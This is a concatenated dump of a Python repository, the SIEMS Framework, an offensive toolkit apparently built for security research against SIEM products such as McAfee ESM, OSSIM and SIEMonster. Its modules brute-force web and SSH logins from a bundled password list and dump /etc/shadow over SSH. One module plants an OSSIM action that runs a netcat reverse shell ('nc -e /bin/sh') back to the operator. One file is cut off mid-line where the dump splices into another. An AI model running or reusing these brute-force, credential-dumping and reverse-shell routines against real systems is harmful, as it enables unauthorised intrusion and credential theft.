4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | from colorama import Fore 10 | from colorama import Style 11 | 12 | # %%%%%%%%%% Functions %%%%%%%%%# 13 | 14 | 15 | def mcafee_users_server(ip): 16 | password = input( 17 | Fore.CYAN + Style.NORMAL + "[!] Enter McAfee root's password: " 18 | + Style.RESET_ALL) 19 | 20 | ssh = paramiko.SSHClient() 21 | ssh.load_system_host_keys() 22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 23 | try: 24 | ssh.connect(ip, username='root', password=password, 25 | banner_timeout=200) 26 | sftp = ssh.open_sftp() 27 | shadow_file = sftp.open('/etc/shadow') 28 | globals.mcafee_messages(2) 29 | for line in shadow_file: 30 | print('[!] ' + line.replace('\n', '')) 31 | 32 | shadow_file.close() 33 | ssh.close() 34 | 35 | except paramiko.AuthenticationException: 36 | globals.messages(10) 37 | ssh.close() 38 | 39 | 40 | # %%%%%%%%%% The End %%%%%%%%%%# 41 | -------------------------------------------------------------------------------- /mcafee/obtainwebinfo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # McAfee Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import json 9 | import base64 10 | import globals 11 | import requests 12 | import logging 13 | 14 | from colorama import Fore 15 | from colorama import Style 16 | 17 | # %%%%%%%%%% Functions %%%%%%%%%# 18 | 19 | 20 | def mcafee_webinfo(ip, port): 21 | agents = 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0' 22 | a = 0 23 | password = input( 24 | Fore.CYAN + Style.NORMAL + "[!] Enter password of the user Web NGCP: " 25 | + Style.RESET_ALL) 26 | url1 = globals.https + ip + ":" + str(port) + "/ess" 27 | url2 = globals.https + ip + ":" + str(port) + "/rs/esm/v2/login" 28 | url3 = globals.https + ip + ":" + str(port) + "/rs/v1/systemInformation" 29 | headers = { 30 | 'Accept': 'application/json,text/plain,*/*', 31 | 'DNT': '1', 32 | 'Host': ip, 33 | 'Origin': globals.https + ip, 34 | 'Referer': globals.https + ip, 35 | 'User-Agent': agents[a], 36 | 'Content-Type': 'application/json;charset=utf-8', 37 | 'Connection': 'keep - alive', 38 | 'X-Xsrf-Token': 'null' 39 | } 40 | 41 | params = { 42 | 'username': 'TkdDUA==', 43 | 'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'), 44 | 'locale': 'en_US', 45 | 'os': "Linux x86_64" 46 | } 47 | json_params = json.dumps(params).encode('utf-8') 48 | data_show = [ 49 | 'callHomeIp', 'releaseNumber', 'hdd', 50 | 'ram', 'processor', 'esssystemTime', 51 | 'statusAndAlertNextCheckIn', 'rulesAndSoftNextCheck', 'backupNextTime' 52 | ] 53 | 54 | try: 55 | requests.post( 56 | url1, data='Request=API%13CAC%5FLOGIN%13%14', 57 | headers=headers, verify=False) 58 | headers['Accept'] = 'application/json' 59 | response = requests.post( 60 | url2, data=json_params, headers=headers, verify=False) 61 | if response.status_code == 201: 62 | headers['Cookie'] = response.headers['Set-Cookie'] 63 | headers['X-Xsrf-Token'] = response.headers['xsrf-token'] 64 | response2 = requests.get(url3, headers=headers, verify=False) 65 | globals.mcafee_messages(1) 66 | data = json.loads(response2.text) 67 | for field in data_show: 68 | if data[field] != "": 69 | print('[!] ' + field + ': ' + str(data[field])) 70 | else: 71 | globals.messages(10) 72 | 73 | except Exception as e: 74 | logging.error(e, exc_info=True) 75 | 76 | # %%%%%%%%%% The End %%%%%%%%%%# 77 | -------------------------------------------------------------------------------- /ossim/bruteforceossim.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # OSSIM Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import os 8 | import base64 9 | import globals 10 | import logging 11 | import requests 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def ossim_brute(ip, port): 17 | 18 | url = globals.https + ip + ":" + str(port) + "/ossim/session/login.php" 19 | __location__ = os.path.realpath(os.path.join( 20 | os.getcwd(), os.path.dirname(__file__))) 21 | file = open(os.path.join(__location__, 'dict.txt')) 22 | successurl = globals.https + ip + "/ossim/" 23 | bruteforceresult = 0 24 | 25 | for line in file: 26 | 27 | ossimpassword = line.strip('\n\r') 28 | ossimpasswordb64 = base64.b64encode(ossimpassword.encode("utf-8")) 29 | base64string = str(ossimpasswordb64, "utf-8") 30 | params = { 31 | 'embed': '', 32 | 'bookmark_string': '', 33 | 'user': 'admin', 34 | 'passu': ossimpassword, 35 | 'pass': base64string 36 | } 37 | 38 | try: 39 | response = requests.post(url, params=params, verify=False) 40 | 41 | if response.status_code == 302 or response.url == successurl: 42 | globals.messages(7) 43 | mess = ['admin', ossimpassword] 44 | globals.messages(9, mess) 45 | bruteforceresult = 1 46 | file.close() 47 | break 48 | 49 | except Exception as e: 50 | logging.error(e, exc_info=True) 51 | 52 | if not bruteforceresult: 53 | globals.messages(8) 54 | file.close() 55 | 56 | # %%%%%%%%%% The End %%%%%%%%%%# 57 | -------------------------------------------------------------------------------- /ossim/dict.txt: -------------------------------------------------------------------------------- 1 | ossim 2 | admin 3 | OSSIM 4 | 0ss1m 5 | Ossim 6 | ossim123 7 | ossim1 8 | ossim2 9 | ossim3 10 | ossim4 11 | ossim5 12 | ossim6 13 | ossim7 14 | ossim8 15 | ossim9 16 | ossim0 17 | ossim! 18 | ossim@ 19 | ossim# 20 | ossim$ 21 | ossim% 22 | ossim^ 23 | ossim& 24 | ossim* 25 | ossim? 26 | Ossim1 27 | Ossim2 28 | Ossim3 29 | Ossim4 30 | Ossim5 31 | Ossim6 32 | Ossim7 33 | Ossim8 34 | Ossim9 35 | Ossim0 36 | Ossim! 37 | Ossim@ 38 | Ossim# 39 | Ossim$ 40 | Ossim% 41 | Ossim^ 42 | Ossim& 43 | Ossim* 44 | Ossim? 45 | 0ssim1 46 | 0ssim2 47 | 0ssim3 48 | 0ssim4 49 | 0ssim5 50 | 0ssim6 51 | 0ssim7 52 | 0ssim8 53 | 0ssim9 54 | 0ssim0 55 | 0ssim! 56 | 0ssim@ 57 | 0ssim# 58 | 0ssim$ 59 | 0ssim% 60 | 0ssim^ 61 | 0ssim& 62 | 0ssim* 63 | 0ssim? 64 | Qssim1 65 | Qssim2 66 | Qssim3 67 | Qssim4 68 | Qssim5 69 | Qssim6 70 | Qssim7 71 | Qssim8 72 | Qssim9 73 | Qssim0 74 | Qssim! 75 | Qssim@ 76 | Qssim# 77 | Qssim$ 78 | Qssim% 79 | Qssim^ 80 | Qssim& 81 | Qssim* 82 | Qssim? 83 | oss1m1 84 | oss1m2 85 | oss1m3 86 | oss1m4 87 | oss1m5 88 | oss1m6 89 | oss1m7 90 | oss1m8 91 | oss1m9 92 | oss1m0 93 | oss1m! 94 | oss1m@ 95 | oss1m# 96 | oss1m$ 97 | oss1m% 98 | oss1m^ 99 | oss1m& 100 | oss1m* 101 | oss1m? 102 | Oss1m1 103 | Oss1m2 104 | Oss1m3 105 | Oss1m4 106 | Oss1m5 107 | Oss1m6 108 | Oss1m7 109 | Oss1m8 110 | Oss1m9 111 | Oss1m0 112 | Oss1m! 113 | Oss1m@ 114 | Oss1m# 115 | Oss1m$ 116 | Oss1m% 117 | Oss1m^ 118 | Oss1m& 119 | Oss1m* 120 | Oss1m? 121 | 0ss1m1 122 | 0ss1m2 123 | 0ss1m3 124 | 0ss1m4 125 | 0ss1m5 126 | 0ss1m6 127 | 0ss1m7 128 | 0ss1m8 129 | 0ss1m9 130 | 0ss1m0 131 | 0ss1m! 132 | 0ss1m@ 133 | 0ss1m# 134 | 0ss1m$ 135 | 0ss1m% 136 | 0ss1m^ 137 | 0ss1m& 138 | 0ss1m* 139 | 0ss1m? 140 | Qss1m1 141 | Qss1m2 142 | Qss1m3 143 | Qss1m4 144 | Qss1m5 145 | Qss1m6 146 | Qss1m7 147 | Qss1m8 148 | Qss1m9 149 | Qss1m0 150 | Qss1m! 151 | Qss1m@ 152 | Qss1m# 153 | Qss1m$ 154 | Qss1m% 155 | Qss1m^ 156 | Qss1m& 157 | Qss1m* 158 | Qss1m? 159 | ossim11 160 | ossim12 161 | ossim13 162 | ossim14 163 | ossim15 164 | ossim16 165 | ossim17 166 | ossim18 167 | ossim19 168 | ossim10 169 | ossim1! 170 | ossim1@ 171 | ossim1# 172 | ossim1$ 173 | ossim1% 174 | ossim1^ 175 | ossim1& 176 | ossim1* 177 | ossim1? 178 | Ossim11 179 | Ossim12 180 | Ossim13 181 | Ossim14 182 | Ossim15 183 | Ossim16 184 | Ossim17 185 | Ossim18 186 | Ossim19 187 | Ossim10 188 | Ossim1! 189 | Ossim1@ 190 | Ossim1# 191 | Ossim1$ 192 | Ossim1% 193 | Ossim1^ 194 | Ossim1& 195 | Ossim1* 196 | Ossim1? 197 | 0ssim11 198 | 0ssim12 199 | 0ssim13 200 | 0ssim14 201 | 0ssim15 202 | 0ssim16 203 | 0ssim17 204 | 0ssim18 205 | 0ssim19 206 | 0ssim10 207 | 0ssim1! 208 | 0ssim1@ 209 | 0ssim1# 210 | 0ssim1$ 211 | 0ssim1% 212 | 0ssim1^ 213 | 0ssim1& 214 | 0ssim1* 215 | 0ssim1? 216 | Qssim11 217 | Qssim12 218 | Qssim13 219 | Qssim14 220 | Qssim15 221 | Qssim16 222 | Qssim17 223 | Qssim18 224 | Qssim19 225 | Qssim10 226 | Qssim1! 227 | Qssim1@ 228 | Qssim1# 229 | Qssim1$ 230 | Qssim1% 231 | Qssim1^ 232 | Qssim1& 233 | Qssim1* 234 | Qssim1? 235 | ossim121 236 | ossim122 237 | ossim123 238 | ossim124 239 | ossim125 240 | ossim126 241 | ossim127 242 | ossim128 243 | ossim129 244 | ossim120 245 | ossim12! 246 | ossim12@ 247 | ossim12# 248 | ossim12$ 249 | ossim12% 250 | ossim12^ 251 | ossim12& 252 | ossim12* 253 | ossim12? 254 | Ossim121 255 | Ossim122 256 | Ossim123 257 | Ossim124 258 | Ossim125 259 | Ossim126 260 | Ossim127 261 | Ossim128 262 | Ossim129 263 | Ossim120 264 | Ossim12! 265 | Ossim12@ 266 | Ossim12# 267 | Ossim12$ 268 | Ossim12% 269 | Ossim12^ 270 | Ossim12& 271 | Ossim12* 272 | Ossim12? 273 | 0ssim121 274 | 0ssim122 275 | 0ssim123 276 | 0ssim124 277 | 0ssim125 278 | 0ssim126 279 | 0ssim127 280 | 0ssim128 281 | 0ssim129 282 | 0ssim120 283 | 0ssim12! 284 | 0ssim12@ 285 | 0ssim12# 286 | 0ssim12$ 287 | 0ssim12% 288 | 0ssim12^ 289 | 0ssim12& 290 | 0ssim12* 291 | 0ssim12? 292 | Qssim121 293 | Qssim122 294 | Qssim123 295 | Qssim124 296 | Qssim125 297 | Qssim126 298 | Qssim127 299 | Qssim128 300 | Qssim129 301 | Qssim120 302 | Qssim12! 303 | Qssim12@ 304 | Qssim12# 305 | Qssim12$ 306 | Qssim12% 307 | Qssim12^ 308 | Qssim12& 309 | Qssim12* 310 | Qssim12? 311 | ossim1231 312 | ossim1232 313 | ossim1233 314 | ossim1234 315 | ossim1235 316 | ossim1236 317 | ossim1237 318 | ossim1238 319 | ossim1239 320 | ossim1230 321 | ossim123! 322 | ossim123@ 323 | ossim123# 324 | ossim123$ 325 | ossim123% 326 | ossim123^ 327 | ossim123& 328 | ossim123* 329 | ossim123? 330 | Ossim1231 331 | Ossim1232 332 | Ossim1233 333 | Ossim1234 334 | Ossim1235 335 | Ossim1236 336 | Ossim1237 337 | Ossim1238 338 | Ossim1239 339 | Ossim1230 340 | Ossim123! 341 | Ossim123@ 342 | Ossim123# 343 | Ossim123$ 344 | Ossim123% 345 | Ossim123^ 346 | Ossim123& 347 | Ossim123* 348 | Ossim123? 349 | 0ssim1231 350 | 0ssim1232 351 | 0ssim1233 352 | 0ssim1234 353 | 0ssim1235 354 | 0ssim1236 355 | 0ssim1237 356 | 0ssim1238 357 | 0ssim1239 358 | 0ssim1230 359 | 0ssim123! 360 | 0ssim123@ 361 | 0ssim123# 362 | 0ssim123$ 363 | 0ssim123% 364 | 0ssim123^ 365 | 0ssim123& 366 | 0ssim123* 367 | 0ssim123? 368 | Qssim1231 369 | Qssim1232 370 | Qssim1233 371 | Qssim1234 372 | Qssim1235 373 | Qssim1236 374 | Qssim1237 375 | Qssim1238 376 | Qssim1239 377 | Qssim1230 378 | Qssim123! 379 | Qssim123@ 380 | Qssim123# 381 | Qssim123$ 382 | Qssim123% 383 | Qssim123^ 384 | Qssim123& 385 | Qssim123* 386 | Qssim123? 387 | oSSIM1 388 | oSSIM2 389 | oSSIM3 390 | oSSIM4 391 | oSSIM5 392 | oSSIM6 393 | oSSIM7 394 | oSSIM8 395 | oSSIM9 396 | oSSIM0 397 | oSSIM! 398 | oSSIM@ 399 | oSSIM# 400 | oSSIM$ 401 | oSSIM% 402 | oSSIM^ 403 | oSSIM& 404 | oSSIM* 405 | oSSIM? 406 | OSSIM1 407 | OSSIM2 408 | OSSIM3 409 | OSSIM4 410 | OSSIM5 411 | OSSIM6 412 | OSSIM7 413 | OSSIM8 414 | OSSIM9 415 | OSSIM0 416 | OSSIM! 417 | OSSIM@ 418 | OSSIM# 419 | OSSIM$ 420 | OSSIM% 421 | OSSIM^ 422 | OSSIM& 423 | OSSIM* 424 | OSSIM? 425 | 0SSIM1 426 | 0SSIM2 427 | 0SSIM3 428 | 0SSIM4 429 | 0SSIM5 430 | 0SSIM6 431 | 0SSIM7 432 | 0SSIM8 433 | 0SSIM9 434 | 0SSIM0 435 | 0SSIM! 436 | 0SSIM@ 437 | 0SSIM# 438 | 0SSIM$ 439 | 0SSIM% 440 | 0SSIM^ 441 | 0SSIM& 442 | 0SSIM* 443 | 0SSIM? 444 | QSSIM1 445 | QSSIM2 446 | QSSIM3 447 | QSSIM4 448 | QSSIM5 449 | QSSIM6 450 | QSSIM7 451 | QSSIM8 452 | QSSIM9 453 | QSSIM0 454 | QSSIM! 455 | QSSIM@ 456 | QSSIM# 457 | QSSIM$ 458 | QSSIM% 459 | QSSIM^ 460 | QSSIM& 461 | QSSIM* 462 | QSSIM? 463 | biteme 464 | 1992 465 | london 466 | soccer 467 | william 468 | querty 469 | liverpool 470 | pussy 471 | admin123 472 | whatever 473 | dallas 474 | hockey 475 | test 476 | zaq1zaq1 477 | 1q2w3e 478 | aaaaaa 479 | killer 480 | bandit 481 | ashley 482 | cookie 483 | merlin 484 | trustno1 485 | 1991 486 | ranger 487 | chelsea 488 | banana 489 | jennifer 490 | 1990 491 | amanda 492 | 1989 493 | hunter 494 | nicole 495 | hello 496 | maverick 497 | blahblah 498 | mercedes 499 | corvette 500 | computer 501 | cheese 502 | ferrari 503 | starwars 504 | 1qaz2wsx 505 | andrea 506 | lakers 507 | andrew 508 | 12341234 509 | matthew 510 | robert 511 | 1234 512 | sophie 513 | pepper 514 | joshua 515 | tigger 516 | 55555 517 | jordan 518 | solo 519 | abcdef 520 | letmein 521 | ginger 522 | jessica 523 | 222222 524 | harley 525 | george 526 | summer 527 | thomas 528 | hannah 529 | daniel 530 | buster 531 | baseball 532 | passw0rd 533 | shadow 534 | freedom 535 | bailey 536 | 121212 537 | zxcvbnm 538 | qwerty123 539 | password1 540 | donald 541 | aa123456 542 | charlie 543 | !@#$%^&* 544 | 654321 545 | monkey 546 | 123123 547 | football 548 | abc123 549 | 666666 550 | welcome 551 | admin 552 | princess 553 | iloveyou 554 | qwerty 555 | sunshine 556 | 1234567 557 | 111111 558 | 12345 559 | 12345678 560 | 123456789 561 | password 562 | 123456 563 | admin1 564 | admin2 565 | admin3 566 | admin4 567 | admin5 568 | admin6 569 | admin7 570 | admin8 571 | admin9 572 | admin0 573 | admin! 574 | admin@ 575 | admin# 576 | admin$ 577 | admin% 578 | admin^ 579 | admin& 580 | admin* 581 | admin? 582 | Admin1 583 | Admin2 584 | Admin3 585 | Admin4 586 | Admin5 587 | Admin6 588 | Admin7 589 | Admin8 590 | Admin9 591 | Admin0 592 | Admin! 593 | Admin@ 594 | Admin# 595 | Admin$ 596 | Admin% 597 | Admin^ 598 | Admin& 599 | Admin* 600 | Admin? 601 | @dmin1 602 | @dmin2 603 | @dmin3 604 | @dmin4 605 | @dmin5 606 | @dmin6 607 | @dmin7 608 | @dmin8 609 | @dmin9 610 | @dmin0 611 | @dmin! 612 | @dmin@ 613 | @dmin# 614 | @dmin$ 615 | @dmin% 616 | @dmin^ 617 | @dmin& 618 | @dmin* 619 | @dmin? 620 | 4dmin1 621 | 4dmin2 622 | 4dmin3 623 | 4dmin4 624 | 4dmin5 625 | 4dmin6 626 | 4dmin7 627 | 4dmin8 628 | 4dmin9 629 | 4dmin0 630 | 4dmin! 631 | 4dmin@ 632 | 4dmin# 633 | 4dmin$ 634 | 4dmin% 635 | 4dmin^ 636 | 4dmin& 637 | 4dmin* 638 | 4dmin? 639 | admin1231 640 | admin1232 641 | admin1233 642 | admin1234 643 | admin1235 644 | admin1236 645 | admin1237 646 | admin1238 647 | admin1239 648 | admin1230 649 | admin123! 650 | admin123@ 651 | admin123# 652 | admin123$ 653 | admin123% 654 | admin123^ 655 | admin123& 656 | admin123* 657 | admin123? 658 | Admin1231 659 | Admin1232 660 | Admin1233 661 | Admin1234 662 | Admin1235 663 | Admin1236 664 | Admin1237 665 | Admin1238 666 | Admin1239 667 | Admin1230 668 | Admin123! 669 | Admin123@ 670 | Admin123# 671 | Admin123$ 672 | Admin123% 673 | Admin123^ 674 | Admin123& 675 | Admin123* 676 | Admin123? 677 | @dmin1231 678 | @dmin1232 679 | @dmin1233 680 | @dmin1234 681 | @dmin1235 682 | @dmin1236 683 | @dmin1237 684 | @dmin1238 685 | @dmin1239 686 | @dmin1230 687 | @dmin123! 688 | @dmin123@ 689 | @dmin123# 690 | @dmin123$ 691 | @dmin123% 692 | @dmin123^ 693 | @dmin123& 694 | @dmin123* 695 | @dmin123? 696 | 4dmin1231 697 | 4dmin1232 698 | 4dmin1233 699 | 4dmin1234 700 | 4dmin1235 701 | 4dmin1236 702 | 4dmin1237 703 | 4dmin1238 704 | 4dmin1239 705 | 4dmin1230 706 | 4dmin123! 707 | 4dmin123@ 708 | 4dmin123# 709 | 4dmin123$ 710 | 4dmin123% 711 | 4dmin123^ 712 | 4dmin123& 713 | 4dmin123* 714 | 4dmin123? 715 | admin121 716 | admin122 717 | admin123 718 | admin124 719 | admin125 720 | admin126 721 | admin127 722 | admin128 723 | admin129 724 | admin120 725 | admin12! 726 | admin12@ 727 | admin12# 728 | admin12$ 729 | admin12% 730 | admin12^ 731 | admin12& 732 | admin12* 733 | admin12? 734 | Admin121 735 | Admin122 736 | Admin123 737 | Admin124 738 | Admin125 739 | Admin126 740 | Admin127 741 | Admin128 742 | Admin129 743 | Admin120 744 | Admin12! 745 | Admin12@ 746 | Admin12# 747 | Admin12$ 748 | Admin12% 749 | Admin12^ 750 | Admin12& 751 | Admin12* 752 | Admin12? 753 | @dmin121 754 | @dmin122 755 | @dmin123 756 | @dmin124 757 | @dmin125 758 | @dmin126 759 | @dmin127 760 | @dmin128 761 | @dmin129 762 | @dmin120 763 | @dmin12! 764 | @dmin12@ 765 | @dmin12# 766 | @dmin12$ 767 | @dmin12% 768 | @dmin12^ 769 | @dmin12& 770 | @dmin12* 771 | @dmin12? 772 | 4dmin121 773 | 4dmin122 774 | 4dmin123 775 | 4dmin124 776 | 4dmin125 777 | 4dmin126 778 | 4dmin127 779 | 4dmin128 780 | 4dmin129 781 | 4dmin120 782 | 4dmin12! 783 | 4dmin12@ 784 | 4dmin12# 785 | 4dmin12$ 786 | 4dmin12% 787 | 4dmin12^ 788 | 4dmin12& 789 | 4dmin12* 790 | 4dmin12? 791 | admin1231 792 | admin1232 793 | admin1233 794 | admin1234 795 | admin1235 796 | admin1236 797 | admin1237 798 | admin1238 799 | admin1239 800 | admin1230 801 | admin123! 802 | admin123@ 803 | admin123# 804 | admin123$ 805 | admin123% 806 | admin123^ 807 | admin123& 808 | admin123* 809 | admin123? 810 | Admin1231 811 | Admin1232 812 | Admin1233 813 | Admin1234 814 | Admin1235 815 | Admin1236 816 | Admin1237 817 | Admin1238 818 | Admin1239 819 | Admin1230 820 | Admin123! 821 | Admin123@ 822 | Admin123# 823 | Admin123$ 824 | Admin123% 825 | Admin123^ 826 | Admin123& 827 | Admin123* 828 | Admin123? 829 | @dmin1231 830 | @dmin1232 831 | @dmin1233 832 | @dmin1234 833 | @dmin1235 834 | @dmin1236 835 | @dmin1237 836 | @dmin1238 837 | @dmin1239 838 | @dmin1230 839 | @dmin123! 840 | @dmin123@ 841 | @dmin123# 842 | @dmin123$ 843 | @dmin123% 844 | @dmin123^ 845 | @dmin123& 846 | @dmin123* 847 | @dmin123? 848 | 4dmin1231 849 | 4dmin1232 850 | 4dmin1233 851 | 4dmin1234 852 | 4dmin1235 853 | 4dmin1236 854 | 4dmin1237 855 | 4dmin1238 856 | 4dmin1239 857 | 4dmin1230 858 | 4dmin123! 859 | 4dmin123@ 860 | 4dmin123# 861 | 4dmin123$ 862 | 4dmin123% 863 | 4dmin123^ 864 | 4dmin123& 865 | 4dmin123* 866 | 4dmin123? -------------------------------------------------------------------------------- /ossim/maliciousaction.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # OSSIM Obtain Reverse Shell from Malicious Action 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import re 8 | import base64 9 | import globals 10 | import getpass 11 | import logging 12 | import paramiko 13 | import requests 14 | 15 | from colorama import Fore, Style 16 | from colorama import init 17 | 18 | init() 19 | 20 | # %%%%%%%%%% Functions %%%%%%%%%# 21 | 22 | 23 | def create_policy(ossimip, ossimport): 24 | authurl = globals.https + ossimip + ":" + str( 25 | ossimport) + "/ossim/session/login.php" 26 | actionurl = globals.https + ossimip + ":" + str( 27 | ossimport) + "/ossim/action/modifyactions.php" 28 | getactionurl = globals.https + ossimip + ":" + str( 29 | ossimport) + "/ossim/action/getaction.php" 30 | getctxurl = globals.https + ossimip + ":" + str( 31 | ossimport) + "/ossim/policy/policy.php?m_opt=configuration&sm_opt=threat_intelligence" 32 | policyurl = globals.https + ossimip + ":" + str( 33 | ossimport) + "/ossim/policy/newpolicy.php" 34 | reloadurl = globals.https + ossimip + ":" + str( 35 | ossimport) + "/ossim/conf/reload.php?what=policies&back=..%2Fpolicy%2Fpolicy.php" 36 | ossimpass = getpass.getpass( 37 | Fore.CYAN + Style.BRIGHT + "[!] Enter OSSIM Admin Password: " + 38 | Style.RESET_ALL) 39 | local_ip = input("[!] Enter your local IP address: ") 40 | actionid = '' 41 | ctxfinal = '' 42 | 43 | ossimpasswordb64 = base64.b64encode(ossimpass.encode("utf-8")) 44 | base64string = str(ossimpasswordb64, "utf-8") 45 | paramsauth = { 46 | 'embed': '', 47 | 'bookmark_string': '', 48 | 'user': 'admin', 49 | 'passu': ossimpass, 50 | 'pass': base64string 51 | } 52 | # netcat reverse shell 53 | netcatcommand = "nc+-e+%2Fbin%2Fsh+" + local_ip + "+12345" 54 | paramsaction = \ 55 | "id=&action=new&old_name=&action_name=testossim&old_descr=&descr=testossim" \ 56 | "&action_type=2&only=on&cond=True&email_from=&email_to=&email_subject"\ 57 | "=&email_message=&exec_command=" + netcatcommand + "&transferred_user=" 58 | 59 | try: 60 | s = requests.Session() 61 | s.post(authurl, data=paramsauth, verify=False) 62 | s.headers.update({'Content-Type': 'application/x-www-form-urlencoded'}) 63 | globals.ossim_messages(1) 64 | 65 | action = s.post(actionurl, data=paramsaction, verify=False) 66 | 67 | if action.status_code == 200 and "Action successfully updated" in action.text: 68 | 69 | actions = s.post( 70 | getactionurl, 71 | data="page=1&rp=20&sortname=descr&sortorder=asc&query=&qtype=", 72 | verify=False) 73 | rows = actions.text.split('SIEMonster ' in response.text: 191 | siemdetected = "SIEMonster" 192 | globals.messages(5, [siemdetected, siemport]) 193 | return siemdetected 194 | except Exception as e: 195 | logging.error(e, exc_info=True) 196 | 197 | 198 | def scan_network(siemnet): 199 | 200 | try: 201 | nm = nmap.PortScanner() 202 | nm.scan(hosts=siemnet, arguments='-PS -Pn -p 8089,443,9000') 203 | return nm.all_hosts() 204 | 205 | except Exception as e: 206 | logging.error(e, exc_info=True) 207 | 208 | # %%%%%%%%%% The End %%%%%%%%%%# 209 | -------------------------------------------------------------------------------- /siemonster/bfssh_smonster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # SIEMonster SSH Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import os 9 | import nmap 10 | import globals 11 | import logging 12 | import paramiko 13 | 14 | # %%%%%%%%%% Functions %%%%%%%%%# 15 | 16 | 17 | def smonster_ssh_bf(ip): 18 | __location__ = os.path.realpath( 19 | os.path.join(os.getcwd(), os.path.dirname(__file__))) 20 | file = open(os.path.join(__location__, 'dict.txt')) 21 | nm = nmap.PortScanner() 22 | bps = 0 23 | 24 | try: 25 | nm.scan(hosts=ip, arguments='-sT -T4 -p 22') 26 | if nm[ip]['tcp'][22]['state'] == 'open': 27 | for line in file: 28 | password = line.strip('\n\r') 29 | if ssh_credentials(ip, password): 30 | mess = ['deploy', password] 31 | globals.messages(7) 32 | globals.messages(9, mess) 33 | file.close() 34 | bps = 1 35 | break 36 | if bps == 0: 37 | globals.messages(8) 38 | file.close() 39 | else: 40 | globals.messages(8) 41 | file.close() 42 | 43 | except Exception as e: 44 | globals.messages(8) 45 | file.close() 46 | logging.error(e, exc_info=True) 47 | 48 | 49 | def ssh_credentials(ip, password): 50 | ssh = paramiko.SSHClient() 51 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 52 | try: 53 | ssh.connect(ip, username='deploy', password=password, 54 | banner_timeout=2000) 55 | return True 56 | except paramiko.AuthenticationException: 57 | return False 58 | -------------------------------------------------------------------------------- /siemonster/systeminfo_smonster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain system info of SIEMonster with SSH 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | from colorama import Fore 10 | from colorama import Style 11 | 12 | # %%%%%%%%%%% Constants %%%%%%%%%%%# 13 | 14 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 15 | 16 | # %%%%%%%%%% Functions %%%%%%%%%# 17 | 18 | 19 | def smonster_ssh_info(ip): 20 | password = input( 21 | Fore.CYAN + Style.NORMAL + "[!] Enter SIEMonster deploy's password: " 22 | + Style.RESET_ALL) 23 | 24 | ssh = paramiko.SSHClient() 25 | ssh.load_system_host_keys() 26 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 27 | try: 28 | ssh.connect(ip, username='deploy', password=password, 29 | banner_timeout=200) 30 | globals.smonster_messages(1) 31 | 32 | commands = [ 33 | ("hostname", "[!] Hostname"), 34 | ("docker ps --format \"table {{.Names}}\t{{.Ports}}\t" 35 | "{{.Status}}\"", "[!] Active Containers"), 36 | ("ls -1 /etc/rc5.d", "[!] List service active"), 37 | ("ifconfig", "[!] Network Configuration"), 38 | ("sudo iptables -nL", "[!] FW Configuration") 39 | ] 40 | 41 | for command in commands: 42 | stdin, stdout, stderr = ssh.exec_command(command[0]) 43 | if stdout != "": 44 | print('') 45 | print(Fore.GREEN + Style.NORMAL + command[1]) 46 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 47 | for i in stdout.readlines(): 48 | print('[!] ' + i.replace('\n', '')) 49 | 50 | except paramiko.AuthenticationException: 51 | globals.messages(10) 52 | ssh.close() 53 | 54 | # %%%%%%%%%% The End %%%%%%%%%%# 55 | -------------------------------------------------------------------------------- /siemonster/usersso_smonster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain SO users of SIEMonster with SSH 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | from colorama import Fore 10 | from colorama import Style 11 | 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def smonster_users_server(ip): 17 | password = input( 18 | Fore.CYAN + Style.NORMAL + "[!] Enter SIEMonster deploy's password: " 19 | + Style.RESET_ALL) 20 | 21 | ssh = paramiko.SSHClient() 22 | ssh.load_system_host_keys() 23 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 24 | try: 25 | ssh.connect(ip, username='deploy', password=password, 26 | banner_timeout=200) 27 | std, stdout, stderr = ssh.exec_command("sudo cat /etc/shadow") 28 | std.flush() 29 | shadow_file = stdout.readlines() 30 | globals.smonster_messages(2) 31 | for line in shadow_file: 32 | print('[!] ' + line.replace('\n', '')) 33 | 34 | ssh.close() 35 | 36 | except paramiko.AuthenticationException: 37 | globals.messages(10) 38 | ssh.close() 39 | 40 | 41 | # %%%%%%%%%% The End %%%%%%%%%%# 42 | -------------------------------------------------------------------------------- /siemsframework.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """ 4 | ------------------------------------------------------------------------------ 5 | SIEMS FRAMEWORK - Agosto 2019 - Yamila Levalle @ylevalle 6 | Actualizacion - Enero 2020 - Diego Espitia @dsespitia 7 | ------------------------------------------------------------------------------ 8 | """ 9 | 10 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 11 | 12 | 13 | import os 14 | import re 15 | import globals 16 | import colorama 17 | 18 | from time import sleep 19 | from colorama import Fore 20 | from colorama import Style 21 | 22 | from graylog.bruteforcegraylog import graylog_brute 23 | from graylog.testcredentialsgraylog import 